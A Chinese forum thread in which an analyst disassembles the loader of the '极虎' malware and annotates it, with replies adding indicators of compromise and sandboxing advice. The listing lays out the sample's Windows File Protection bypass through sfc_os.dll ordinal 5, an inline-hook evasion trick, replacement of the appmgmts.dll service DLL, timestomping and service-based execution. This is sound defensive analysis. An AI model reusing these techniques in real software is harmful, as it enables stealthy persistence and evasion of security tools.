极虎样本分析 by 零度x[LSG]
本帖最后由 是昔流芳 于 2011-2-11 12:14 编辑
第一次分析病毒,比较菜,只分析了 exe(loader)的运行过程,释放出的主体 DLL 尚未分析,大牛们勿笑我,新手,求鼓励~
行为概述(loader 部分):通过 sfc_os.dll 的 5 号序号导出函数为目标文件登记 WFP(Windows 文件保护)例外,调用时自己执行该函数开头 3 字节的热补丁序言再跳到 +3,以绕过挂在函数入口的用户态钩子;把自身文件读入内存,改为 DLL 属性(该步骤在下面贴出的代码中未体现)后覆盖写入 C:\WINDOWS\system32\appmgmts.dll(AppMgmt 服务的 ServiceDll),用 SetFileTime 还原原文件的时间戳,最后通过 SCM 启动 AppMgmt 服务,让 svchost 加载该 DLL。此外:若自身位于可移动盘,则以 explorer.exe /n,X:\ 打开该盘窗口;并在 C:\DelInfo.bin 中写入一个 DWORD 和自身路径。
; [Loader, 00401B9A] Decide whether this image is executing as the process EXE or has
; been loaded as a DLL. Memory operands were stripped by the forum paste; the offsets
; below are recovered from the opcode bytes (8D45 E4 = [ebp-1C], 8B45 E8 = [ebp-18]).
00401B9A|.6A 1C push 1C ; /BufSize = 1C (28.) = sizeof(MEMORY_BASIC_INFORMATION) on x86
00401B9C|.8D45 E4 lea eax, dword ptr ; | mbi at [ebp-1C]
00401B9F|.50 push eax ; |Buffer
00401BA0|.FF75 E0 push dword ptr ; |Address = [ebp-20] (where it is set is not shown; presumably an address inside this image)
00401BA3|.FF15 2C914000 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00401BA9|.8B45 E8 mov eax, dword ptr ; eax = mbi.AllocationBase ([ebp-1C]+4) = base of the module containing Address
00401BAC|.A3 38DC4000 mov dword ptr , eax ; save it in global 0040DC38
00401BB1|.6A 00 push 0 ; /pModule = NULL
00401BB3|.FF15 04914000 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA -> base of the process EXE
00401BB9|.3B05 38DC4000 cmp eax, dword ptr ; EXE base == our AllocationBase ?
00401BBF|.75 16 jnz short 00401BD7 ; differ => this code is not the main EXE (loaded as a DLL); the original note says this path exits the thread, but 00401BD7 is not shown
; [00402056] Create a thread message queue and block in GetMessageA. Posting WM_NULL
; to the current thread guarantees GetMessageA returns at least once. The purpose of
; this detour (delay / keep-alive / anti-sandbox) cannot be determined from these lines.
00402056 .FF15 14924000 call dword ptr [<&USER32.GetInputStat>; [GetInputState — result unused; a USER32 call is the usual way to make sure the thread owns a message queue so PostThreadMessage does not fail
0040205C .6A 00 push 0 ; /lParam = 0
0040205E .6A 00 push 0 ; |wParam = 0
00402060 .6A 00 push 0 ; |Message = WM_NULL
00402062 .FF15 48914000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
00402068 .50 push eax ; |ThreadId = self
00402069 .FF15 18924000 call dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA — post to ourselves
0040206F .6A 00 push 0 ; /MsgFilterMax = 0
00402071 .6A 00 push 0 ; |MsgFilterMin = 0
00402073 .6A 00 push 0 ; |hWnd = NULL (thread messages)
00402075 .8D85 BCFDFFFF lea eax, dword ptr ; | MSG at [ebp-244]
0040207B .50 push eax ; |pMsg
0040207C .FF15 0C924000 call dword ptr [<&USER32.GetMessageA>>; \GetMessageA — returns once the WM_NULL above is dequeued
; [004064B4] Removable-drive check. If this EXE sits on a removable drive (the typical
; autorun case) it opens an Explorer window on that drive, so the user sees the window
; they expected. Offsets from opcodes: own path [ebp-228], root buffer [ebp-120],
; root+3 = [ebp-11D], ShellExecute parameter string [ebp-268].
004064B4|.68 04010000 push 104 ; /BufSize = 104 (260.)
004064B9|.8D85 D8FDFFFF lea eax, dword ptr ; | [ebp-228]
004064BF|.50 push eax ; |PathBuffer
004064C0|.6A 00 push 0 ; |hModule = NULL -> path of this EXE
004064C2|.FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004064C8|.68 04010000 push 104 ; /n = 104 (260.) — clear the root buffer [ebp-120]
004064CD|.6A 00 push 0 ; |c = 00
004064CF|.8D85 E0FEFFFF lea eax, dword ptr ; |
004064D5|.50 push eax ; |s
004064D6|.E8 67290000 call <jmp.&MSVCRT.memset> ; \memset
004064DB|.83C4 0C add esp, 0C
004064DE|.8D85 D8FDFFFF lea eax, dword ptr ; own path
004064E4|.50 push eax ; /String2
004064E5|.8D85 E0FEFFFF lea eax, dword ptr ; | root buffer (same 104h size, so no overflow)
004064EB|.50 push eax ; |String1
004064EC|.FF15 1C914000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
004064F2|.68 01010000 push 101 ; /n = 101 (257.)
004064F7|.6A 00 push 0 ; |c = 00
004064F9|.8D85 E3FEFFFF lea eax, dword ptr ; | root+3
004064FF|.50 push eax ; |s
00406500|.E8 3D290000 call <jmp.&MSVCRT.memset> ; \memset
00406505|.83C4 0C add esp, 0C ; memset(root+3, 0, 101h): keep only the first 3 chars, i.e. "X:\" (drive root)
00406508|.8D85 E0FEFFFF lea eax, dword ptr
0040650E|.50 push eax ; /RootPathName = "X:\"
0040650F|.FF15 A4904000 call dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA
00406515|.83F8 02 cmp eax, 2 ; DRIVE_REMOVABLE == 2
00406518|.75 39 jnz short 00406553 ; not removable: skip the Explorer launch
0040651A|.8D85 E0FEFFFF lea eax, dword ptr
00406520|.50 push eax ; /<%s> = "X:\"
00406521|.68 A09A4000 push 00409AA0 ; |Format = "/n,%s" -> "/n,X:\" (explorer switch: new single-pane window rooted at the drive)
00406526|.8D85 98FDFFFF lea eax, dword ptr ; |
0040652C|.50 push eax ; |s
0040652D|.FF15 10924000 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00406533|.83C4 0C add esp, 0C
00406536|.6A 05 push 5 ; /IsShown = 5 (SW_SHOW)
00406538|.6A 00 push 0 ; |DefDir = NULL
0040653A|.8D85 98FDFFFF lea eax, dword ptr ; |
00406540|.50 push eax ; |Parameters = "/n,X:\"
00406541|.68 A89A4000 push 00409AA8 ; |FileName = "explorer.exe"
00406546|.68 B89A4000 push 00409AB8 ; |Operation = "open"
0040654B|.6A 00 push 0 ; |hWnd = NULL
0040654D|.FF15 E4914000 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA — shows the drive so the autorun launch is not noticed
00406553|>C745 EC C09A4>mov dword ptr , 00409AC0 ; [ebp-14] = 00409AC0 (string pointer, use not shown). End of the removable-drive branch.
; [00401681] Write C:\DelInfo.bin: a 4-byte value followed by a string, with no
; terminator or length prefix. Arguments of this routine (from opcodes): [ebp+8] =
; string, [ebp+C] = DWORD. The name suggests the dropped DLL later reads it to delete
; the original dropper; that consumer is not visible here — confirm in the DLL.
00401681|> \6A 00 push 0 ; /hTemplateFile = NULL
00401683|.68 80000000 push 80 ; |Attributes = NORMAL
00401688|.FFB5 E8FEFFFF push dword ptr ; |Mode = [ebp-118] (creation disposition chosen by the caller, not shown)
0040168E|.6A 00 push 0 ; |pSecurity = NULL
00401690|.6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692|.68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401697|.68 08934000 push 00409308 ; |FileName = "C:\DelInfo.bin" — fixed path in the drive root: easy host IoC
0040169C|.FF15 C4904000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004016A2|.8985 ECFEFFFF mov dword ptr , eax ; [ebp-114] = hFile (no INVALID_HANDLE_VALUE check visible)
0040175C|> \6A 00 push 0 ; /pOverlapped = NULL
0040175E|.8D45 FC lea eax, dword ptr ; |
00401761|.50 push eax ; |pBytesWritten ([ebp-4])
00401762|.6A 04 push 4 ; |nBytesToWrite = 4
00401764|.8D45 0C lea eax, dword ptr ; | &arg2 ([ebp+C])
00401767|.50 push eax ; |Buffer
00401768|.FFB5 ECFEFFFF push dword ptr ; |hFile
0040176E|.FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile — writes the DWORD argument (observed as 01 00 00 00 in this trace)
00401774|.6A 00 push 0 ; /pOverlapped = NULL
00401776|.8D45 FC lea eax, dword ptr ; |
00401779|.50 push eax ; |pBytesWritten
0040177A|.FF75 08 push dword ptr ; |/String = arg1 ([ebp+8])
0040177D|.FF15 D0904000 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00401783|.50 push eax ; |nBytesToWrite = strlen (the NUL is not written)
00401784|.FF75 08 push dword ptr ; |Buffer = arg1
00401787|.FFB5 ECFEFFFF push dword ptr ; |hFile
0040178D|.FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile — appends the string (the dropper's own path in this trace)
00401793|.FFB5 ECFEFFFF push dword ptr ; /hFile
00401799|.FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
; [00401C0B] Read the module's own file into memory. Up to 32h (50) attempts to open
; its own path; [ebp-120] is the retry counter (and dword ptr , 0 / cmp ..., 32 from
; the opcodes). The code between 00401C5B and 00401C70 (success test, probably a
; Sleep) is not shown, nor is the buffer allocation between 00401C7B and 00401CEF.
00401C0B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00401C10|.8D85 E8FEFFFF lea eax, dword ptr ; | path buffer [ebp-118]
00401C16|.50 push eax ; |PathBuffer
00401C17|.FF75 08 push dword ptr ; |hModule = arg1 ([ebp+8])
00401C1A|.FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401C20|.83A5 E0FEFFFF>and dword ptr , 0 ; retry counter [ebp-120] = 0
00401C27|.EB 0D jmp short 00401C36
00401C29|>8B85 E0FEFFFF /mov eax, dword ptr ; counter++
00401C2F|.40 |inc eax
00401C30|.8985 E0FEFFFF |mov dword ptr , eax
00401C36|>83BD E0FEFFFF> cmp dword ptr , 32 ; 50 attempts max
00401C3D|.7D 31 |jge short 00401C70 ; give up — falls into GetFileSize with whatever [ebp-C] holds (INVALID_HANDLE_VALUE if every open failed); no check is visible here
00401C3F|.6A 00 |push 0 ; /hTemplateFile = NULL
00401C41|.6A 00 |push 0 ; |Attributes = 0
00401C43|.6A 03 |push 3 ; |Mode = OPEN_EXISTING
00401C45|.6A 00 |push 0 ; |pSecurity = NULL
00401C47|.6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ
00401C49|.68 00000080 |push 80000000 ; |Access = GENERIC_READ
00401C4E|.8D85 E8FEFFFF |lea eax, dword ptr ; |
00401C54|.50 |push eax ; |FileName = own path
00401C55|.FF15 C4904000 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401C5B|.8945 F4 |mov dword ptr , eax ; [ebp-C] = handle to own image (retry presumably covers the file still being held by whoever dropped it)
00401C70|> \6A 00 push 0 ; /pFileSizeHigh = NULL
00401C72|.FF75 F4 push dword ptr ; |hFile
00401C75|.FF15 24914000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00401C7B|.8945 F8 mov dword ptr , eax ; [ebp-8] = own file size (low DWORD only)
00401CEF|.6A 00 push 0 ; /pOverlapped = NULL
00401CF1|.8D45 FC lea eax, dword ptr ; |
00401CF4|.50 push eax ; |pBytesRead
00401CF5|.FF75 F8 push dword ptr ; |BytesToRead = whole file
00401CF8|.FFB5 E4FEFFFF push dword ptr ; |Buffer = [ebp-11C] (allocated in the gap above)
00401CFE|.FF75 F4 push dword ptr ; |hFile
00401D01|.FF15 EC904000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00401D07|.FF75 F4 push dword ptr ; /hFile — own image is now in memory; presumably this is the buffer later written to appmgmts.dll (the global 0040DC3C used at 00401FAA)
00401D0A|.FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
; [004020AE] Prepare the drop: Windows dir, temp dir, SCM handle, the WFP-bypass
; function from sfc_os.dll, the target service, and the target DLL path.
; Offsets from opcodes: windir [ebp-228], temp [ebp-118], hSCM [ebp-4], hSfc [ebp-64C],
; service name [ebp-BD0], hService [ebp-120], DLL base name [ebp-C10], path [ebp-758].
004020AE .68 04010000 push 104 ; /BufSize = 104 (260.)
004020B3 .8D85 D8FDFFFF lea eax, dword ptr ; |
004020B9 .50 push eax ; |Buffer
004020BA .FF15 38914000 call dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA -> e.g. C:\WINDOWS
004020C0 .68 04010000 push 104 ; /n = 104 (260.) — clear the temp-path buffer
004020C5 .6A 00 push 0 ; |c = 00
004020C7 .8D85 E8FEFFFF lea eax, dword ptr ; |
004020CD .50 push eax ; |s
004020CE .E8 6F6D0000 call <jmp.&MSVCRT.memset> ; \memset
004020D3 .83C4 0C add esp, 0C
004020D6 .8D85 E8FEFFFF lea eax, dword ptr
004020DC .50 push eax ; /Buffer
004020DD .68 04010000 push 104 ; |BufSize = 104 (260.)
004020E2 .FF15 4C914000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA (use of the temp path is not shown in this excerpt)
004020E8 .68 3F000F00 push 0F003F ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
004020ED .6A 00 push 0 ; lpDatabaseName = NULL
004020EF .6A 00 push 0 ; lpMachineName = NULL (local SCM)
004020F1 .FF15 18904000 call dword ptr [<&ADVAPI32.OpenSCMana>;ADVAPI32.OpenSCManagerA — needs administrative rights
004020F7 .8945 FC mov dword ptr , eax ; [ebp-4] = hSCManager (failure handling not shown)
004020FA .68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll" (Windows File Protection engine)
004020FF .FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105 .8985 B4F9FFFF mov dword ptr , eax ; [ebp-64C] = hModule of sfc_os.dll
0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5 — undocumented export, commonly named SfcFileException: registers a per-file WFP exception, it does not disable WFP globally
00402120 .FFB5 B4F9FFFF push dword ptr ; |hModule
00402126 .FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
0040212C .A3 44DC4000 mov dword ptr , eax ; global 0040DC44 = address of sfc_os.dll!#5 (consumed at 00401EC8)
004021B8 > \68 FF010F00 push 0F01FF ; dwDesiredAccess = SERVICE_ALL_ACCESS
004021BD .8D85 30F4FFFF lea eax, dword ptr ; lpServiceName at [ebp-BD0] ("AppMgmt" per the original trace)
004021C3 .50 push eax
004021C4 .FF75 FC push dword ptr ; hSCManager
004021C7 .FF15 14904000 call dword ptr [<&ADVAPI32.OpenServic>;ADVAPI32.OpenServiceA
004021CD .8985 E0FEFFFF mov dword ptr , eax ; [ebp-120] = hService for AppMgmt (Application Management; on XP-era Windows hosted by svchost with ServiceDll = %SystemRoot%\system32\appmgmts.dll)
004021FA .50 push eax ; lpServiceStatus (address loaded above, not shown)
004021FB .FFB5 E0FEFFFF push dword ptr ; hService
00402201 .FF15 04904000 call dword ptr [<&ADVAPI32.QueryServi>;ADVAPI32.QueryServiceStatus
00402207 .83BD D8F3FFFF>cmp dword ptr , 1 ; SERVICE_STATUS field at [ebp-C28] == SERVICE_STOPPED (1)? (likely: the DLL can only be overwritten while svchost does not hold it; the branch is not shown)
0040225C .8D85 F0F3FFFF lea eax, dword ptr ; DLL base name at [ebp-C10]
00402262 .50 push eax ; /<%s>
00402263 .8D85 D8FDFFFF lea eax, dword ptr ; | windir
00402269 .50 push eax ; |<%s>
0040226A .68 BC944000 push 004094BC ; |Format = "%s\system32\%s.dll"
0040226F .8D85 A8F8FFFF lea eax, dword ptr ; |
00402275 .50 push eax ; |s
00402276 .FF15 10924000 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
0040227C .83C4 10 add esp, 10 ; [ebp-758] = C:\WINDOWS\system32\appmgmts.dll — a WFP-protected system file, hence the sfc_os.dll step
0040227F .8D85 A8F8FFFF lea eax, dword ptr
00402285 .50 push eax ; target path -> argument of the drop routine at 00401E53
; [00401E53] Register a WFP exception for the target path by calling sfc_os.dll!#5 with
; a hand-made CALL that skips the function's first 3 bytes. Arg [ebp+8] = target path;
; wide copy at [ebp-848] (from opcode 8D85 B8F7FFFF).
00401E53 .FF75 08 push dword ptr ; /Path = "C:\WINDOWS\system32\appmgmts.dll"
00401E56 .FF15 F0914000 call dword ptr [<&SHLWAPI.PathFileExistsA>] ; \PathFileExistsA
00401E5C .83F8 01 cmp eax, 1 ; target exists? (presumably selects CREATE_ALWAYS vs OPEN_EXISTING for the CreateFileA at 00401F14; the branch is not shown)
00401E91 .FFB5 B4F7FFFF push dword ptr ; /WideBufSize ([ebp-84C])
00401E97 .8D85 B8F7FFFF lea eax, dword ptr ; |
00401E9D .50 push eax ; |WideCharBuf
00401E9E .FFB5 B4F7FFFF push dword ptr ; |StringSize (same value as WideBufSize — size is in chars, fine for ANSI->UTF-16)
00401EA4 .FF75 08 push dword ptr ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll"
00401EA7 .6A 00 push 0 ; |Options = 0
00401EA9 .6A 00 push 0 ; |CodePage = CP_ACP
00401EAB .FF15 98904000 call dword ptr [<&KERNEL32.MultiByteToWideChar>]; \MultiByteToWideChar — sfc_os.dll takes a wide path
00401EB1 .8365 FC 00 and dword ptr , 0 ; [ebp-4] = 0
00401EB5 .6A FF push -1 ; arg3 = -1
00401EB7 .8D85 B8F7FFFF lea eax, dword ptr
00401EBD .50 push eax ; arg2 = wide path
00401EBE .6A 00 push 0 ; arg1 = 0  => sfc_os!#5(0, L"C:\WINDOWS\system32\appmgmts.dll", -1)
00401EC0 .68 F91E4000 push 00401EF9 ; push the return address by hand: this plus the JMP below emulates CALL
00401EC5 .8BFF mov edi, edi ; these two instructions are byte-for-byte the callee's 3-byte hot-patch prologue (8BFF 55)...
00401EC7 .55 push ebp ; ...executed here instead of inside the callee
00401EC8 .A1 44DC4000 mov eax, dword ptr ; eax = sfc_os.dll!#5 (saved at 0040DC44 by 0040212C)
00401ECD .83C0 03 add eax, 3 ; skip the prologue
00401ED0 .FFE0 jmp eax ; enter the function past its entry point: any inline hook AV/HIPS placed on the first bytes never sees this call. Net effect: WFP will not restore appmgmts.dll after it is overwritten
; [00401F14] Overwrite appmgmts.dll with the in-memory image. Exclusive open, original
; timestamps captured first (restored at 0040200C). Offsets from opcodes: mode [ebp-30],
; hFile [ebp-2C], write offset [ebp-24], source pointer [ebp-1C]; globals 0040DC3C =
; image buffer base, 0040DC40 = image size.
00401F14 > \6A 00 push 0 ; /hTemplateFile = NULL
00401F16 .6A 00 push 0 ; |Attributes = 0
00401F18 .FF75 D0 push dword ptr ; |Mode = [ebp-30] (CREATE_ALWAYS or OPEN_EXISTING, chosen after PathFileExistsA)
00401F1B .6A 00 push 0 ; |pSecurity = NULL
00401F1D .6A 00 push 0 ; |ShareMode = 0 — exclusive: fails while svchost has the DLL mapped, which is why the service state was checked
00401F1F .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24 .FF75 08 push dword ptr ; |FileName = target path
00401F27 .FF15 C4904000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
00401F2D .8945 D4 mov dword ptr , eax ; [ebp-2C] = hFile
00401F50 .50 push eax ; /pLastWrite = 0012F304 (&[ebp-38]) — original timestamps saved for later timestomping
00401F51 .8D45 C0 lea eax, dword ptr ; |
00401F54 .50 push eax ; |pLastAccess ([ebp-40])
00401F55 .8D45 B8 lea eax, dword ptr ; |
00401F58 .50 push eax ; |pCreationTime ([ebp-48])
00401F59 .FF75 D4 push dword ptr ; |hFile
00401F5C .FF15 44914000 call dword ptr [<&KERNEL32.GetFileTime>] ; \GetFileTime
00401F62 .837D D0 02 cmp dword ptr , 2 ; mode == CREATE_ALWAYS (2), i.e. the file did not exist? (branch not shown; for an existing file the original note gives the write offset [ebp-24] as 3C, the e_lfanew field)
00401F9A > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401F9C .6A 00 push 0 ; |pOffsetHi = NULL
00401F9E .FF75 DC push dword ptr ; |OffsetLo = [ebp-24]
00401FA1 .FF75 D4 push dword ptr ; |hFile
00401FA4 .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FAA .A1 3CDC4000 mov eax, dword ptr ; eax = image buffer base (global 0040DC3C)
00401FAF .0345 DC add eax, dword ptr ; + write offset
00401FB2 .8945 E4 mov dword ptr , eax ; [ebp-1C] = source = image + offset
00401FB5 .6A 00 push 0 ; /pOverlapped = NULL
00401FB7 .8D45 D8 lea eax, dword ptr ; |
00401FBA .50 push eax ; |pBytesWritten
00401FBB .A1 40DC4000 mov eax, dword ptr ; | image size (global 0040DC40)
00401FC0 .2B45 DC sub eax, dword ptr ; | - offset
00401FC3 .50 push eax ; |nBytesToWrite = size - offset
00401FC4 .FF75 E4 push dword ptr ; |Buffer
00401FC7 .FF75 D4 push dword ptr ; |hFile
00401FCA .FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile
00401FD0 .85C0 test eax, eax ; image bytes from the offset to the end now overwrite appmgmts.dll. The step that flips IMAGE_FILE_DLL in the in-memory header (the intro's "change itself into a DLL") is not among these lines
; NOTE: the original post pasted this SetFilePointer/SetEndOfFile pair twice; the seven
; lines that follow are repeated verbatim right after (same addresses 00401FE1-00401FF7).
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 .6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 .FF35 40DC4000 push dword ptr ; |OffsetLo = 3CC00 (248832.) = image size (global 0040DC40)
00401FEB .FF75 D4 push dword ptr ; |hFile
00401FEE .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 .FF75 D4 push dword ptr ; /hFile
00401FF7 .FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile — truncate to the image size, discarding any tail of the original DLL
; [00401FE1] Truncate the target to the image size, then put the original timestamps back.
00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN
00401FE3 .6A 00 push 0 ; |pOffsetHi = NULL
00401FE5 .FF35 40DC4000 push dword ptr ; |OffsetLo = 3CC00 (248832.) = image size (global 0040DC40)
00401FEB .FF75 D4 push dword ptr ; |hFile
00401FEE .FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer
00401FF4 .FF75 D4 push dword ptr ; /hFile
00401FF7 .FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile — file size is now exactly the dropper's image size
00401FFD .8D45 C8 lea eax, dword ptr ; &[ebp-38] = last-write time captured at 00401F5C
00402000 .50 push eax ; /pLastWrite
00402001 .8D45 C0 lea eax, dword ptr ; |
00402004 .50 push eax ; |pLastAccess
00402005 .8D45 B8 lea eax, dword ptr ; |
00402008 .50 push eax ; |pCreationTime
00402009 .FF75 D4 push dword ptr ; |hFile
0040200C .FF15 34914000 call dword ptr [<&KERNEL32.SetFileTime>] ; \SetFileTime — timestomping: Explorer/dir show the original dates. Forensics: SetFileTime generally rewrites only NTFS $STANDARD_INFORMATION, so compare with $FILE_NAME times, and verify the file by hash/signature rather than by date
00402012 .FF75 D4 push dword ptr ; hFile -> CloseHandle (call itself not shown)
; [00402293] Start the AppMgmt service: svchost loads the overwritten appmgmts.dll, so the
; payload runs inside a trusted system process with no new process image, no Run key and
; no new service entry to flag. Detection: AppMgmt transitioning to running right after a
; write to system32\appmgmts.dll.
00402293 > \6A 00 push 0 ; lpServiceArgVectors = NULL
00402295 .6A 00 push 0 ; dwNumServiceArgs = 0
00402297 .FFB5 E0FEFFFF push dword ptr ; hService = [ebp-120] (opened at 004021C7)
0040229D .FF15 24904000 call dword ptr [<&ADVAPI32.StartServiceA>] ;ADVAPI32.StartServiceA — start the service
好久没有分析文章出来了,先休息了,明天看下,感谢分享! 写的不错,感谢分享,顺便把释放的东西也分析下吧~ 哈哈不错 我真佩服 很不错的说~~ 感谢分享……
可以用 Filemon/Regmon(现已合并为 Process Monitor)监视样本生成了哪些文件和注册表项。注意该样本会覆盖受 WFP 保护的系统 DLL 并启动服务,务必在隔离的虚拟机快照里跑;从上面的代码已能看到的 IoC 有:C:\DelInfo.bin、被改写但时间戳被还原的 system32\appmgmts.dll(比对哈希/签名,不要只看日期)、以及 AppMgmt 服务被启动。
然后分析下~~ 写的很好最好再分类下 加精鼓励下,loader部分大概这么多,有时间再分析下主体DLL吧. 多谢鼓励,正在分析~
004020FA .68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll"
; (quoted from the main post) Resolve sfc_os.dll export #5 — the per-file WFP exception
; routine commonly called SfcFileException; its address is stored in global 0040DC44.
004020FF .FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105 .8985 B4F9FFFF mov dword ptr , eax ; [ebp-64C] = hModule of sfc_os.dll
0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5 (undocumented, looked up by ordinal so no import-table entry names it)
00402120 .FFB5 B4F9FFFF push dword ptr ; |hModule
00402126 .FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
这里调用的是 sfc_os.dll 的 5 号序号导出函数(未文档化,通常称为 SfcFileException),它只为指定的单个文件登记一次 WFP 例外,并不是关闭整个系统文件保护;这样覆盖 appmgmts.dll 后 WFP 既不会弹窗,也不会从 dllcache 把原文件恢复回来。另外注意 00401EC5 处样本自己执行了该函数开头的 mov edi,edi / push ebp,再跳到函数地址 +3,这是为了绕过挂在函数入口的内联钩子。 学习了~